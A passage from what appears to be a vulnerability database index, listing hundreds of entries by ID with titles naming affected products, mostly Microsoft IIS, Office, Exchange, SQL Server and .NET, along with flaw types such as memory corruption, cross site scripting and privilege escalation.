Access cross site scripting [43087] Microsoft Office Snapshot Viewer ActiveX up to Office 2003 Snapshot Viewer ActiveX Control snapview.ocx privilege escalation [42966] Novell iPrint Client up to 4.34 Client for Windows ienipp.ocx memory corruption [42816] Microsoft Word 2000/2003 denial of service [42326] Microsoft Office up to Xp denial of service [42317] TFTP Server SP 1.4/1.5 on Windows memory corruption [42065] Microsoft SharePoint Server 2.0 Rich Text Editor cross site scripting [41881] Microsoft Office 2003/2007/2007 Sp1/Xp denial of service [41880] Microsoft Project 2000/2002/2003 denial of service [41613] BootManage TFTPD Windows memory corruption [41455] Microsoft Office 2000/2003/2004/Xp privilege escalation [41454] Microsoft Excel 2000/2002/2003/2007 memory corruption [41453] Microsoft Excel 2000/2002/2003 privilege escalation [41452] Microsoft Excel 2000/2002/2003/2007 privilege escalation [41451] Microsoft Excel 2000/2002/2003 privilege escalation [41450] Microsoft Excel 2000 privilege escalation [41449] Microsoft Excel 2000/2002/2003 privilege escalation [41448] Microsoft Office 2000/Xp Office Web Components privilege escalation [41289] Symantec Backup Exec 12.0 on Windows ActiveX Control pvcalendar.ocx privilege escalation [41288] Symantec Backup Exec 12.0 on Windows ActiveX Control pvcalendar.ocx memory corruption [41003] Microsoft Office 2000/2003/2004/Xp denial of service [41002] Microsoft Office 2000/2003/Xp denial of service [40985] Microsoft IIS up to 6.0 privilege escalation [40084] 3ivx Mpeg-4 Codec 4.5.1 Windows Media Player mplayer2.exe memory corruption [40042] Microsoft Access memory corruption [40020] Microsoft Office 2007 ZIP Container privilege escalation [38957] Microsoft SQL Server privilege escalation [38899] Microsoft ISA Server 2004 information disclosure [38782] Microsoft Visual Studio up to 6.0 ActiveX Control pdwizard.ocx privilege escalation [38728] Microsoft SQL Server 2005 Enterprise Manager sqldmo.dll memory corruption [38595] Microsoft MSN Messenger 7.0 memory corruption [38253] Microsoft Visual Studio 6.0 ActiveX Control vdt70.dll NotSafe memory corruption [38184] Atheros 802.11 ABG Wireless Adapter Driver up to 802.10 on Windows denial of service [38026] Sun Java System Application Server up to 8.2 on Windows unknown vulnerability [37739] Microsoft Excel 2000/2002/2003/2004/2007 memory corruption [37738] Microsoft Office 2002/2003 memory corruption [37566] Microsoft Excel 2003 unknown vulnerability [37508] Microsoft MSN Messenger 4.7 denial of service [37352] Microsoft Office DataSourceControl memory corruption [37173] Microsoft Office htimage.exe unknown vulnerability [37010] Microsoft Office 2000 ActiveX Control ouactrl.ocx memory corruption [37004] Microsoft IIS memory corruption [36628] Microsoft Word 2000/2002/2003/2004 winword.exe privilege escalation [36621] Microsoft Exchange Server 2000 Numeric Error [36620] Microsoft Exchange Server 2000 Outlook Web Access cross site scripting [36619] Microsoft Exchange Server 2000/2003/2007 MIME memory corruption [36618] Microsoft Exchange Server 2000 denial of service [36617] Microsoft Excel 2000/2002/2003/2004 memory corruption [36051] Microsoft Word 2007 file798-1.doc memory corruption [36050] Microsoft Word 2007 file789-1.doc memory corruption [36041] Microsoft .NET Framework 2.0.50727.42 cross site scripting [35684] Microsoft Visual Studio mfc42u.dll afxoleseteditmenu memory corruption [35373] Microsoft Excel 2003 denial of service [35372] Microsoft Office 2003 denial of service [35161] Microsoft ISA Server 2004 unknown vulnerability [35011] Microsoft PowerPoint memory corruption [35001] Microsoft Office 2000/2003/2004/Xp privilege escalation [35000] Microsoft Word 2000/2002/2003 privilege escalation [34993] Microsoft Office 2000/2003/Xp memory corruption [34991] Microsoft Visual Studio 8.0 msvcr80.dll denial of service [34592] Microsoft Visual Studio 6.0 msdev.exe memory corruption [34322] Microsoft Office 2000/2003/Xp memory corruption [34321] Microsoft Office 2000/2003/2004/Xp Spreadsheet memory corruption [34320] Microsoft Office 2000/2003/2004/Xp memory corruption [34319] Microsoft Office 2000/2003/2004/Xp memory corruption [34318] Microsoft Office 2000/2003/2004/Xp memory corruption [34253] Microsoft IIS denial of service [34126] Microsoft Office 2003 memory corruption [34122] Microsoft Office Web Components 2000 privilege escalation [33866] Microsoft IIS 5.1 Web Directory com privilege escalation [33851] Microsoft Word 2000/2002/2003 12122006-djtest.doc memory corruption [33766] Microsoft Word 2000/2002/2003 memory corruption [33067] Microsoft Visual Studio .net 2005 ActiveX Control wmiscriptutils.dll memory corruption [32693] Microsoft Word 2004 memory corruption [32690] Microsoft Office 2000/2003/2004/Xp privilege escalation [32689] Microsoft Excel 2000/2002/2003/2004/XP memory corruption [32688] Microsoft Excel 2000/2002/2003/2004/XP memory corruption [32687] Microsoft Word 2000/2002 memory corruption [32686] Microsoft Office 2000/2001/2003/2004 Numeric Error [32685] Microsoft Office 2000/2001/2003/2004 memory corruption [32676] Microsoft Office 2000/2001/2003/2004 privilege escalation [32675] Microsoft Office 2000/2003/2004/Xp privilege escalation [32055] Microsoft Visual Studio 6.0 tcprops.dll memory corruption [32006] Cybozu Garoon 2.1.0 For Windows sql injection [31692] Microsoft PowerPoint 2000/2001/2002/2003 memory corruption [31691] Microsoft Hyperlink Object Library hlink.dll object memory corruption [31679] IBM Informix Dynamic Server up to 9.40 on Windows memory corruption [31358] Microsoft PowerPoint 2003 powerpnt.exe denial of service [31354] Microsoft PowerPoint 2003 memory corruption [31351] Microsoft ISA Server 2004 Filters unknown vulnerability [31318] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31317] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31316] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31313] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31312] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31311] Microsoft Excel 2000/2002/2003/XP privilege escalation [31310] Microsoft Excel 2000/2002/2003/2004/XP memory corruption [31237] Microsoft Office 2000/2003/Xp privilege escalation [31235] Microsoft Office 2000/2003/Xp memory corruption [31233] Microsoft Office 2000/2003/Xp mso.dll lscreateline memory corruption [29831] Microsoft Malware Protection Engine up to 1.1.10600.0 privilege escalation [29524] Microsoft ISA Server 2004 unknown vulnerability [29423] Microsoft Office 2000/2003/2004/Xp excel.exe privilege escalation [29414] Microsoft .NET Framework 1.0/1.1 memory corruption [29209] Microsoft Office 2000/2003/2004/Xp memory corruption [29208] Microsoft Office 2000/2003/2004/Xp memory corruption [29207] Microsoft Office 2000/2003/2004/Xp memory corruption [29206] Microsoft Office 2000/2003/2004/Xp memory corruption [29205] Microsoft Office 2000/2003/2004/Xp memory corruption [29005] Lighttpd 1.4.10 on Windows response.c information disclosure [28939] Microsoft Word 2003 denial of service [25752] Microsoft MSN Messenger weak encryption [25649] Microsoft IIS 5.0 Application Firewall cross site scripting [25518] Microsoft ISA Server 2000 Packet Filter unknown vulnerability [25517] Microsoft ISA Server 2000 unknown vulnerability [25397] Microsoft ISA Server 2000 wspsrv.exe denial of service [24822] Microsoft Outlook 2003 Outlook Web Access weak authentication [24640] Microsoft Office InfoPath 2003 SP1 information disclosure [24510] Microsoft Word 2000/2002/2003 memory corruption [24284] Microsoft SharePoint Team Services cross site scripting [24280] Microsoft Exchange Server up to 5.0 memory corruption [23648] Microsoft Word 6.0 memory corruption [22126] Microsoft Outlook 2003 Access Restriction privilege escalation [68417] Microsoft Exchange 2013 Outlook Web Access privilege escalation [68416] Microsoft Exchange 2007/2010/2013 Outlook Web Access privilege escalation [68409] Microsoft Office 2007/2010/2013 memory corruption [68408] Microsoft Excel 2007/2010/2013 privilege escalation [68407] Microsoft Excel 2007/2010 privilege escalation [68406] Microsoft Word memory corruption [68405] Microsoft Word 2007/2010 Index privilege escalation [68404] Microsoft IIS 7.5 Error Message mypage cross site scripting [68193] Microsoft IIS 8.0/8.5 IP/Domain Restriction privilege escalation [68191] Microsoft SharePoint 2010 cross site scripting [68188] Microsoft Word 2007 File privilege escalation [68187] Microsoft Word 2007 File privilege escalation [68186] Microsoft Word 2007 File privilege escalation [68185] Microsoft .NET Framework up to 4.5.2 Object privilege escalation [67829] Microsoft Office 2007/2010/2011 Object privilege escalation [67825] Microsoft .NET Framework 2.0/3.5/3.5.1 ASLR privilege escalation [67824] Microsoft .NET Framework up to 4.5.2 denial of service [67823] Microsoft .NET Framework up to 4.5.2 ClickOnce privilege escalation [67518] Microsoft Lync 2013 denial of service [67517] Microsoft Lync 2013 Script Reflected cross site scripting [67516] Microsoft Lync 2010/2013 privilege escalation [67514] Microsoft .NET Framework up to 4.5.2 Hash Collision Form denial of service [67452] Novell GroupWise Client 8.0x/2012/2014 on Windows denial of service [67361] Microsoft .NET Framework 1.1/2.0/3.0/3.5/3.5.1 ASLR privilege escalation [67360] Microsoft SharePoint 2013 App Permission Management privilege escalation [67354] Microsoft SQL Server 2008 R2 SP2/2008 SP3/2012 SP1/2014 SQL Master Data Services denial of service [67353] Microsoft SQL Server 2008 R2 SP2/2008 SP3/2012 SP1/2014 T-SQL Query cross site scripting [66976] Microsoft Access 2010 VBA denial of service [21964] Microsoft Java Virtual Machine 5.0.0.3810 Sandbox privilege escalation [21838] Microsoft Sharepoint Portal Server 2001 cross site scripting [21586] HD Soft Windows FTP Server up to 1.6 wscanf Format String [20941] NIPrint LPD-LPR Print Server up to 4.10 Windows Explorer Invoker privilege escalation [20870] Microsoft Wordperfect Converter Corel Wordperfect File memory corruption [20869] Microsoft Access 97/2000/2002 Snapshot Viewer ActiveX Control memory corruption [20732] Microsoft SQL Server 7.0/2000 Named Pipe denial of service [20695] Microsoft ISA Server Error Page 400.htm/500.htm cross site scripting [20581] Sun One Application Server 7.0 on Windows Error Message cross site scripting [20580] Sun One Application Server 7.0 on Windows URI weak authentication [20579] Sun One Application Server 7.0 on Windows JSP Request Source information disclosure [20395] Microsoft Proxy Server/ISA Server Winsock Service denial of service [20327] Microsoft Word/Excel 98 Field Code information disclosure [20214] Microsoft ISA Server 2000 DNS Intrusion Detection Application Filter denial of service [20162] National University Of Singapore uxterm 2.3/2.4.1 Windows Title privilege escalation [20111] Apache HTTP Server up to 2.0.43 on Windows HTTP Request privilege escalation [20109] Microsoft Outlook 2002 V1 Exchange Server Security Certificate weak encryption [20037] Trend Micro Interscan Viruswall 3.52 on Windows gzip Content Encoding privilege escalation [19743] Microsoft Outlook 2002 javascript URI cross site scripting [19742] Microsoft Outlook 2000/2002 IFRAME privilege escalation [19671] Apache HTTP Server 1.3.20 on Windows /php/ privilege escalation [19650] Apache Tomcat 4.0.3 on Windows HTTP Request information disclosure [19623] Microsoft SQL Server up to 2000 SP2 Stored Procedure sp_MSSetServerProperties/sp_MSsetalertinfo privilege escalation [19563] MySQL up to 3.20.52 on Windows Service privilege escalation [19550] Microsoft IIS 5.0/5.1 HTTP Request denial of service [19518] Microsoft Exchange 2000 Request denial of service [19515] Microsoft Exchange 2000 Remote Procedure Call denial of service [19514] Microsoft SQL Server up to 2000 Authentication Password weak encryption [19500] Oracle Application Server up to 9.0.2.0.1 on Windows web-inf privilege escalation [19497] Macromedia JRun 3.0/3.1/4.0 on Windows web-inf privilege escalation [19474] Microsoft MSN Messenger up to 4.6 Request denial of service [19452] MySQL up to 3.23.2 on Windows weak authentication [19433] Microsoft IIS 4.0/5.0 SMTP Service privilege escalation [19388] Microsoft IIS 5.0 CodeBrws.asp memory corruption [19387] Microsoft IIS 5.0 CodeBrws.asp directory traversal [19361] Microsoft IIS 5.1 Frontpage Server Extension File colegal.htm directory traversal [19360] Microsoft IIS 5.1 GET Request /_vti_pvt/access.cnf Path information disclosure [19359] Microsoft Office XP Spreadsheet Host privilege escalation [19342] Microsoft MSN Messenger up to 4.6 memory corruption [19338] Microsoft IIS 4.0 File privilege escalation [19222] Microsoft Office Web Components 10 DataSourceControl ConnectionFile information disclosure [19221] Microsoft Office Web Components 10 Spreadsheet File information disclosure [19220] Microsoft Office Web Components 9/10 Chart Load File information disclosure [19218] Microsoft Outlook 2002 Header Field denial of service [19181] Microsoft Java Virtual Machine 1.1 Restriction privilege escalation [19180] Microsoft Java Virtual Machine 1.1 HTML Object Reference privilege escalation [19179] Microsoft Java Virtual Machine 1.1 CabCracker com.ms.vm.loader.cabcracker load0 privilege escalation [19178] Microsoft Java Virtual Machine up to 5.0.3805 Standard Security Manager com.ms.security.StandardSecurityManager privilege escalation [19177] Microsoft Java Virtual Machine 1.1 privilege escalation [19176] Microsoft Java Virtual Machine 1.1 Applet ClipBoardGetText/ClipBoardSetText Clipboard privilege escalation [19175] Microsoft Java Virtual Machine 1.1 getNativeServices memory corruption [19174] Microsoft Java Virtual Machine 1.1 getabsolutepath Directory information disclosure [19173] Microsoft Java Virtual Machine up to 1.1 Class Name Class.forName/ClassLoader.loadClass memory corruption [19172] Microsoft Java Virtual Machine 1.1 URL privilege escalation [19136] Microsoft IIS 5.0/5.1 WebDAV Memory denial of service [19135] Microsoft IIS up to 5.1 cross site scripting [19134] Microsoft IIS 5.0 Source Access Permission Script privilege escalation [19133] Microsoft IIS up to 5.1 dllhost.exe privilege escalation [19087] Microsoft SQL Server up to 7.0 Stored Procedure xp_runwebtask privilege escalation [19060] Microsoft SQL Server 7.0/2000 Data Engine privilege escalation [19059] Microsoft SQL Server 7.0/2000 Database Console Command memory corruption [18800] Microsoft SQL Server 2000 Authentication memory corruption [18789] Microsoft SQL Server 2000 SP2 Stored Procedure sp_MScopyscript privilege escalation [18786] Microsoft File Transfer Manager up to 3.x ActiveX Control Persist weak authentication [18785] Microsoft File Transfer Manager up to 3.x ActiveX Control memory corruption [18777] Microsoft Project 2000/2002 Office Web Components Copy/Paste privilege escalation [18776] Microsoft Project 2000/2002 Office Web Components LoadText File information disclosure [18774] Microsoft Project 2002 Office Web Components setTimeout privilege escalation [18755] Microsoft SQL Server 2000 Jet Engine opendatasource memory corruption [18745] Microsoft SQL Server 7.0/2000 Extended Stored Procedure privilege escalation [18742] Apache HTTP Server up to 2.0.39 on Windows/OS2/Netware Error Message Path information disclosure [18615] Microsoft SQL Server 2000 0x08 Packet denial of service [18609] Microsoft Exchange 5.5 Mail Connector memory corruption [18607] Microsoft SQL Server 7.0/2000 Data Access Components OpenRowSet memory corruption [18605] Apache HTTP Server up to 2.0.39 on Windows/OS2/Netware Backslash directory traversal [18598] Microsoft SQL Server 2000 Keep-Alive denial of service [18597] Microsoft SQL Server 2000 Resolution Service memory corruption [18596] Microsoft SQL Server 2000 Stored Procedure sql injection [18595] Microsoft SQL Server 2000 DBCC memory corruption [18593] Microsoft Word 2000 Mail Merge Tool privilege escalation [18592] Microsoft Excel 2000/2002 Macro Security privilege escalation [18591] Microsoft Excel 2000/2002 Macro Security privilege escalation [18590] Microsoft Excel 2000/2002 Macro Security privilege escalation [18528] Microsoft MSN Messenger 3.6 Communication weak authentication [18498] Microsoft IIS 5.0/5.1 WebDAV IP Address information disclosure [18497] Microsoft IIS 4.0 Change Password /iisadmpwd privilege escalation [18495] Microsoft IIS up to 5.1 NTLM Authentication information disclosure [18449] Microsoft .NET Framework 1.0 orderdetails.aspx information disclosure [18411] Microsoft SQL Server 2000 Query memory corruption [18410] Microsoft SQL Server 2000 Password Encryption memory corruption [18348] Microsoft IIS 4.0/5.0 HTR Request memory corruption [18346] Microsoft SQL Server 2000 SQLXML cross site scripting [18345] Microsoft SQL Server 2000 SQLXML ISAPI Extension memory corruption [18245] Microsoft Exchange 2000 RFC Message Attribute denial of service [18173] Apache HTTP Server 2.0.28 on Windows CGI Module php.exe Path information disclosure [18146] Microsoft MSN Messenger Service for Exchange 4.5/4.6 ActiveX Control memory corruption [18138] Microsoft Word 2000/2002 Rich Text Format cross site scripting [18134] Microsoft MSN Messenger 4.0 ActiveX Object information disclosure [18095] Microsoft SQL Server 7.0/2000 Extended Stored Procedure memory corruption [18076] Microsoft IIS 4.0/5.0/5.1 HTTP Header memory corruption [18075] Microsoft IIS 4.0/5.0/5.1 ASP Server-Side Include memory corruption [18074] Microsoft IIS 4.0/5.0/5.1 Error Page cross site scripting [18073] Microsoft IIS 4.0/5.0/5.1 ASP Data Transfer memory corruption [18072] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer memory corruption [18071] Microsoft IIS 4.0/5.0/5.1 Error cross site scripting [18070] Microsoft IIS 4.0/5.0/5.1 Help File Search cross site scripting [18069] Microsoft IIS 4.0/5.0/5.1 FTP Service denial of service [18068] Microsoft IIS 4.0/5.0/5.1 URL Parser w3svc.dll denial of service [18067] Microsoft IIS 4.0/5.0 HTR ISAPI Extension ism.dll memory corruption [17961] Microsoft SQL Server 7.0/2000 OLE DB Provider memory corruption [17955] Microsoft Exchange 2000 Privilege Registry privilege escalation [17948] Microsoft Office on Mac PID Checker denial of service [17852] Microsoft ISA Server 2000 UDP Packet denial of service [17762] Microsoft SQL Server 7.0/2000 C Runtime Format String [17759] Microsoft SQL Server 7.0/2000 memory corruption [17743] Citrix ICA Client 6.1 on Windows ICA File privilege escalation [17735] Microsoft IIS 5.0 Content-Length Header denial of service [17662] Microsoft Exchange 5.5 Outlook Web Access privilege escalation [17604] Microsoft IIS 3.0/4.0/5.0 Web Log Entry weak authentication [17583] Microsoft Excel/PowerPoint 98/2000/2001/2002 Data Stream privilege escalation [17571] Microsoft Exchange 5.5 Outlook Web Access User information disclosure [17569] Microsoft IIS 4.0 Redirect denial of service [17424] Microsoft IIS up to 4.0 Unicode Character Source information disclosure [17388] Microsoft ISA Server 2000 URL cross site scripting [17374] Microsoft ISA Server 2000 H.323 denial of service [17370] Microsoft IIS 5.0 WebDAV denial of service [17360] Microsoft IIS 4.0 Index Server SQLQHit.asp information disclosure [17161] Microsoft Outlook 2002 View ActiveX Control privilege escalation [17050] Microsoft Exchange 2000/5.5 Outlook Web Access cross site scripting [17015] Microsoft Exchange 2000/5.5 LDAP denial of service [16972] IRIX/Linux/Windows MSS denial of service [16965] Microsoft IIS 4.0/5.0 Device File asp.dll Scripting.FileSystemObject denial of service [16917] Microsoft ISA Server 2000 Web Proxy denial of service [16839] Microsoft IIS 5.0 MS01-014/MS01-016 Patches denial of service [16838] Microsoft IIS 5.0 MS00-060 Patch denial of service [16837] Microsoft Internet Information Server 4.0/5.0 FTP Service User information disclosure [16836] Microsoft IIS 5.0 FTP Service denial of service [16835] Microsoft IIS 3.0/4.0/5.0 Escape Character directory traversal [16754] Microsoft Outlook up to 2000 Holiday Feature weak authentication [16709] Microsoft IIS 5.0 WebDAV Request denial of service [16705] Microsoft Exchange/IIS URL Memory denial of service [16602] Microsoft Visual Studio 6.0 VB-TSQL Debugger vbsdicli.exe memory corruption [16599] Microsoft Outlook 2000/98/5.0 vCard memory corruption [16493] Microsoft Exchange 5.0/5.5 SMTP Command memory corruption [16425] Microsoft IIS 4.0/5.0 Frontpage Server Extensions denial of service [16371] Microsoft IIS 4.0/5.0 URL File information disclosure [16369] Microsoft IIS 4.0/5.0 Double Byte Character Set Source information disclosure [16295] Microsoft Exchange 2000 User Account weak authentication [16260] Microsoft IIS 4.0/5.0 Error Message cross site scripting [16181] Microsoft IIS 4.0/5.0 ASP Session Cookie weak authentication [16162] Microsoft IIS 5.0 Index Server privilege escalation [16108] Microsoft IIS 4.0/5.0 Executable Files Parser privilege escalation [16106] Microsoft IIS 4.0/5.0 Unicode directory traversal [16027] Microsoft Exchange 5.5 MIME Header denial of service [15989] Microsoft IIS 4.0 URL INETINFO.EXE denial of service [15930] Microsoft Word 2000 Mail Merge Tool privilege escalation [15920] Microsoft IIS 5.0 ASP File privilege escalation [15912] Microsoft IIS 4.0/5.0 File Permission privilege escalation [15907] Microsoft Word/Excel/Powerpoint 2000 Object Tag memory corruption [15898] Microsoft Outlook 98/2000 vCard denial of service [15895] Microsoft Outlook 97/98/2000 Rich Text Path information disclosure [15888] Microsoft IIS 4.0/5.0 Error Message shtml.dll cross site scripting [15782] Microsoft Outlook up to 2000 Cache privilege escalation [15773] Microsoft Outlook up to 2000 Date Field memory corruption [15770] Microsoft IIS 4.0/5.0 Request privilege escalation [15766] Microsoft IIS 3.0/4.0/5.0 Administrative Script denial of service [15764] Microsoft IIS 2.0/3.0/4.0/5.0/5.1 HTTP 1.0 Request IP Address information disclosure [15626] Microsoft Exchange 4.0/5.0 Field Blank denial of service [15608] Apache HTTP Server up to 1.3.6.2 on Windows Directory information disclosure [15548] Microsoft Outlook up to 98 Message denial of service [15546] Microsoft IIS 4.0/5.0 HTR Request ISM.DLL privilege escalation [15542] Microsoft Office 2000 UA ActiveX Control Show Me privilege escalation [15540] Microsoft IIS 4.0/5.0 File Extension denial of service [15535] Microsoft IIS 4.0/5.0 HTR Request inetinfo.exe denial of service [15530] Microsoft IIS 4.0/5.0 Frontpage Server Extensions shtml.exe Path information disclosure [15444] Microsoft IIS 4.0/5.0 URL privilege escalation [15422] Microsoft Excel 97/2000 XLM 7PK Security Features [15416] Microsoft IIS 4.0/5.0 ISAPI Extension Source information disclosure [15400] Microsoft IIS 4.0 Chunked Transfer Encoding memory corruption [15379] Microsoft SQL Server 7.0 SELECT Statement privilege escalation [15376] Microsoft Clip Art Gallery 5.0 CIL File memory corruption [15364] Microsoft Exchange Read Receipt denial of service [15300] Microsoft IIS 3.0/4.0 Frontpage Server Extensions /_vti_bin/shtml.dll Username information disclosure [15270] Microsoft IIS 3.0/4.0 Sample Internet Data Query Script directory traversal [15265] Microsoft IIS Visual Basic Script denial of service [15243] Microsoft IIS 4.0 IDA/IDQ File Path information disclosure [15206] Microsoft IIS 4.0 Microsoft Visual InterDev weak authentication [15195] Microsoft PowerPoint 95/97 Slide Show privilege escalation [15186] Microsoft IIS 4.0 winmsdp.exe privilege escalation [15163] DEC OpenVMS 5.3/5.5.2 VMS DECwindows/MOTIF weak authentication [15149] Microsoft IIS 4.0 Domain Resolution privilege escalation [15148] Microsoft IIS 3.0 ASP Site denial of service [15141] Microsoft IIS 4.0 FTP Server denial of service [15126] Microsoft Excel 97 Russian New Year Call privilege escalation [15125] Microsoft Exchange 5.0/5.5 NNTP/SMTP denial of service [15123] Microsoft IIS 3.0/4.0 on x86/Alpha HTTP GET denial of service [15120] Microsoft IIS 2.0/3.0 ASP Source information disclosure [15080] Microsoft IIS 4.0 ASP File Source information disclosure [15079] Microsoft IIS 4.0 URL privilege escalation [15056] Microsoft Exchange 5.0/5.5 Access Control List Configuration [15054] Apache HTTP Server on Windows URL privilege escalation [14990] Microsoft SQL Server 7.0 TDS Packet privilege escalation [14905] Microsoft Java Virtual Machine Sandbox Configuration [14860] Microsoft MSN Messenger 4.71.0.10 setupbbs.ocx vAddNewsServer/bIsNewsServerConfigured memory corruption [14853] Microsoft IIS 4.0 File privilege escalation [14783] Microsoft IIS 3.0/4.0 Asian Language Configuration [14772] Microsoft IIS 4.0 HTTP Request privilege escalation [14771] Microsoft IIS 3.0 SSL ISAPI Filter race condition [14759] Microsoft Exchange 5.5 SMTP Address privilege escalation [14731] Microsoft IIS 3.0/4.0 Data Access Components privilege escalation [14722] Microsoft IIS 3.0/4.0 SSL denial of service [14721] Microsoft IIS 4.0 Sun Java HotSpot denial of service [14703] Microsoft Outlook 97/98/2000 X-UIDL Header denial of service [14694] Microsoft IIS 4.0 Request IDC memory corruption [14648] Microsoft IIS denial of service [14640] Microsoft IIS 4.0 codebrws.asp privilege escalation [14639] Microsoft IIS 4.0 code.asp privilege escalation [14638] Microsoft IIS 4.0 viewcode.asp privilege escalation [14637] Microsoft IIS 4.0 showcode.asp privilege escalation [14636] Microsoft Excel 97 Malware Warning privilege escalation [14539] Microsoft Exchange SMTP Service denial of service [14536] Microsoft Frontpage/Personal Web Server URL privilege escalation [14512] Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion privilege escalation [14496] Microsoft IIS 3.0/4.0 ASP showfile.asp FileSystemObject privilege escalation [14492] Microsoft IIS 4.0 /IISADMPWD privilege escalation [14467] Microsoft IIS 3.0/4.0 FTP Server memory corruption [14466] Microsoft IIS 4.0 ASP Caching information disclosure [14465] Microsoft IIS 2.0/3.0/4.0/5.0 IISAPI Extension perl.exe information disclosure [14458] Microsoft IIS 3.0/4.0 NLST Command denial of service [14450] Microsoft IIS 4.0 Frontpage Server Extensions fpcount.exe memory corruption [14349] Microsoft IIS Server Side Includes #exec privilege escalation [14324] Microsoft IIS 4.0 Log privilege escalation [14314] Microsoft Access 97 Password weak encryption [14271] Microsoft Exchange 5.5 LDAP Bind bind memory corruption [14157] Microsoft IIS 3.0/4.0 PKCS #1 information disclosure [14140] Microsoft IIS 3.0/4.0 ASP File information disclosure [14074] Microsoft IIS 4.0 File Name privilege escalation [14050] Microsoft Exchange 4.0/5.0 SMTP HELO memory corruption [13974] Microsoft IIS 3.0 newdsn.exe privilege escalation [13908] Microsoft IIS 2.0/3.0 URL denial of service [13812] Microsoft IIS 1.0/2.0/3.0 ASP Code privilege escalation [13725] Microsoft IIS 1.0 cmd privilege escalation [13547] Microsoft Lync 2010/2013 Meeting cross site scripting [13545] Microsoft Word 2007 Embedded Font memory corruption [13462] Microsoft Visual Studio 2002/2003/2005/2010 Debug Interface msdia.dll privilege escalation [13394] IBM DB2 up to 10.5.0.2 on Windows Stored Procedure privilege escalation [13230] Microsoft .NET Framework up to 4.5.1 TypeFilterLevel Check privilege escalation [13229] Microsoft Office 2007/2010/2013 Common Control Library MSCOMCTL.OCX privilege escalation [13228] Microsoft Office 2013 Document information disclosure [13227] Microsoft Office 2007/2010/2013 Chinese Grammar Checker privilege escalation [13226] Microsoft SharePoint Server 2007/2010/2013 Page privilege escalation [13225] Microsoft SharePoint Server 2007/2010/2013 cross site scripting [13224] Microsoft SharePoint Server 2007/2010/2013 Page privilege escalation [12859] Microsoft Word 2003 Office Document memory corruption [12845] Microsoft Word 2003 Office File memory corruption [12844] Microsoft Word 2007/2010 Office File memory corruption [12843] Microsoft Office 2007/2010/2011/2013 XML Parser denial of service [12801] Microsoft Xbox Live Password Recovery weak authentication [12693] haxx.se cURL/libcURL up to 7.35.0 on Windows Schannel SSL Backend privilege escalation [12687] Microsoft Word/Office/Outlook 2003/2007/2010/2013 RTF Document memory corruption [12311] Microsoft Lync 2010 Search privilege escalation [12271] Microsoft .NET Framework up to 4.5.1 HTTP POST privilege escalation [12266] Microsoft .NET Framework 2.0 SP2/3.5.1 ASLR privilege escalation [12265] Microsoft .NET Framework up to 4.5.1 privilege escalation [12185] Microsoft .NET Framework 2/4 HMAC weak authentication [12116] Pidgin 2.10.7 on Windows file:/ gtkutils.c privilege escalation [12089] Microsoft Bing 4.2.0 on Android DNS Response APK File Installation privilege escalation [12070] Apple Pages 2.0/2.0.1/2.0.2/5.0/5.0.1 on Mac Microsoft Word Document denial of service [11951] Microsoft Word/Office/Sharepoint Office File memory corruption [11950] Microsoft Office Compability Pack/Word 2007 SP3 File memory corruption [11949] Microsoft Word Viewer/Office Compatibility Pack/Word 2003 SP3/2007 SP3 File memory corruption [11494] Microsoft .NET Framework 2.0 SP2/3.5.1/4/4.5/4.5.1 MAC Authentication privilege escalation [11468] Microsoft Exchange 2010/2013 cross site scripting [11466] Microsoft Office 2013 File Response information disclosure [11457] Microsoft SharePoint Server/Office Web Apps 2010 SP1/2010 SP2/2013 W3WP Service Account privilege escalation [11448] Microsoft Office 2007/2010 Address Space Layout Randomization privilege escalation [11230] Microsoft Word 2003 DOC Document denial of service [11151] Microsoft Outlook -/2007/2010/2013 S/MIME Certificate Metadata Expansion information disclosure [11149] Microsoft Office -/2003/2007/2010/2013 WordPerfect Document epsimp32.flt memory corruption [11148] Microsoft Office 2003/2007 WordPerfect Document epsimp32.flt memory corruption [11146] Microsoft Office 2003/2007 epsimp32.flt memory corruption [10648] Microsoft Word 2007 Word File memory corruption [10647] Microsoft Word 2003 Word File memory corruption [10643] Microsoft SharePoint Server 2007/2010/2013 Input Sanitizer memory corruption [10642] Microsoft SharePoint Server 2007/2010 Content Display in Frames privilege escalation [10640] Microsoft .NET Framework up to 4.5 JSON Data privilege escalation [10639] Microsoft .NET Framework up to 4.5 XML External Entity privilege escalation [10250] Microsoft SharePoint Server up to 2013 W3WP Process privilege escalation [10249] Microsoft SharePoint 2010/2003/2007/2.0/3.0 Workflow privilege escalation [10248] Microsoft SharePoint Server up to 2013 cross site scripting [10247] Microsoft SharePoint Server 2007/2010/2013 Online Cloud cross site scripting [10245] Microsoft Office 2003/2007/2010 Word File memory corruption [10244] Microsoft Office 2003 SP3 Word File memory corruption [10243] Microsoft Office 2003/2007 Word File memory corruption [10242] Microsoft Office 2007 Word File memory corruption [10241] Microsoft Office 2007 Word File memory corruption [10240] Microsoft Office 2003/2007/2010 Word File memory corruption [10239] Microsoft Office 2003/2007 Word File memory corruption [10238] Microsoft Excel 2003/2007 XML External Entity Data memory corruption [10237] Microsoft Excel 2003/2007/2010 XML External Entity Data privilege escalation [10236] Microsoft Word/Office 2003/2007 XML External Entity Data information disclosure [10235] Microsoft Excel/Office/SharePoint Office File memory corruption [10234] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10233] Microsoft Word/Sharepoint Office File memory corruption [10232] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10231] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10230] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10229] Microsoft Access 2007/2010/2013 Access File memory corruption [10228] Microsoft Access 2007/2010/2013 Access File memory corruption [10227] Microsoft Access 2007/2010/2013 Access File memory corruption [10189] Microsoft Outlook 2007/2010 S/MIME denial of service [9715] Microsoft PowerPoint 2007 DirectShow Runtime quartz.dll GetMaxSampleSize memory corruption [9558] Novell GroupWise Client up to 2012 12.0.1 HP1 on Windows Javascript/Active X Script cross site scripting [9397] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Array privilege escalation [9395] Microsoft .NET Framework up to 4.5 Object Delegation privilege escalation [9394] Microsoft .NET Framework 2.0 